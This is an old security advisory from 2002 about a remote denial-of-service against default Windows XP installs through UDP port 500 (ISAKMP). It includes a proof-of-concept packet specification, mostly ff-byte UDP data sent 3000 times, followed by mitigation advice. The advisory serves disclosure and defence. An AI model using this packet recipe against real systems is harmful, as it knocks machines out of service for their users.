HCE-xp

XP DoS

trang này đã được đọc lần

Affected : Windows XP default install with UDP 500 open :
Type : Remote DOS attacks with UDP Packets. Make CPU 100 % :
Date : 15-02-2002 :
Author : NtWaK0 @ www.SafeHack.com :
+-----------------------------------------------------------------------.
:
+----------------.
Remote/Local DOS \
+------------------`----------------------------------------------------.
:
+-----------. :
Disclaimer \ :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on :
experiments though it may be false. The opinions expressed in this :
advisory and program are my own and NOT of any company. :
In Fact I do not work for no one at the present time. :
:
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone :
does with this information. So, don't shoot the messenger. :
Remember: Use a computer in ways that ensure respect for your fellows. :
:
+-------. :
T.O.C. \ :
+---------`-------------------------------------------------------------.
:
:
[ Brief History . . . . . . . . . . . . . . . . . . . . . .line 42 ]:
:
[ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 59 ]:
:
[ The Solution . . . . . . . . . . . . . . . . . . . . . .line 122 ]:
:
+-------------. :
Brief History \ :
+---------------`-------------------------------------------------------.
UPD port 500 is open by default on a Fresh installed XP box. :
The attack is seriouse since it work remotly and can make the CPU 100 % :
in less then 20 Second. The CPU utilistation stay normal for 10 Second :
or so and then it will JUMP one shot to 100 %. :
To learn more about Windows XP please visit: :
http://www.microsoft.com :
:
YES YOUR HAVE GUESSED IT ENGLISH IS NOT MY MOTHER LANGUAGE -:) :
+---------------------------+ :
>>> Test OS Applications <<< :
+---------------------------+ :
Tested on Windows XP :
Default Install with default ports :
:
+-----------. :
The Problem \ :
+-------------`---------------------------------------------------------.
What is Port 500 isaKMP ? :
========================= :
:
[Extracted From http://www.networkice.com/advice/Exploits/Ports] :
Port 500 ISAKMP, pluto :
Internet Security Association and Key Management Protocol (ISAKMP) :
This port is available on most systems that support IPsec. Many IPsec- :
compatible VPN providers use this port, such as Nortel/Bay Networks :
Extranet Access Client. See : RFC2408 :
:
If an attacker target your Windows XP port 500 UDP they can cause 100 % :
CPU utilisation in less then 40 Second. :
The speed while sending the packet was 20 K upload sometime less then :
18 K [Based on DU-Meter] :
:
The target machine is a windows XP with 240 RAM. :
:
I could not do any TASK on the XP machine till I stoped sending packets.:
:
I can see this as a seriouse problem if you are using windows XP default:
:
Imagine someone is attacking your Windows XP from 1000 zombies. I am :
not sure if your Windows XP wont Crash. :
:
Like I said I send couples of packets and the CPU jumped in less then :
40 Sec to 100 %. Soon I am going to do more tests. :
:
:
+-----------------------------------------+ :
>>> Proof-Of-Concept-Packet-Information <<< :
+-----------------------------------------+ :
[IP] :
SourceAddress= :
SourcePort=1 :
DestinationAddress= :
DestinationPort=500 :
HeaderSize=20 :
SpecifyHeaderSize=0 :
Identification=0 :
SpecifyIdentification=0 :
Checksum=0 :
SpecifyChecksum=0 :
TypeService=0 :
FragmentationType=2 :
DataSize=32 :
Offset=0 :
TTL=1 :
:
[Commands] :
NbPackets=3000 :
PacketType=1 :
:
[UDP] :
Checksum=0 :
SpecifyUDPChecksum=0 :
Data=xffxffxffxffxffxffxffxffxffffx00 :
:
........................................................................:
........................................................................:
:
+------------. :
The Solution \ :
+--------------`--------------------------------------------------------.
Vendor should be informed...I guess Microsoft read Securityfocus too :
Filter UDP 500 and other UNUSED ports. Stop Unused Services :
+-----------------------------------------------------------------------.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPG1AEvPoW9fFNsN8EQLqCwCgw4aWTB7M30hXNJwVVkNmkLNDrYUAoKVi
S7PMma1mU4sNRtfxrAjmxBYm
=l6tz
-----END PGP SIGNATURE-----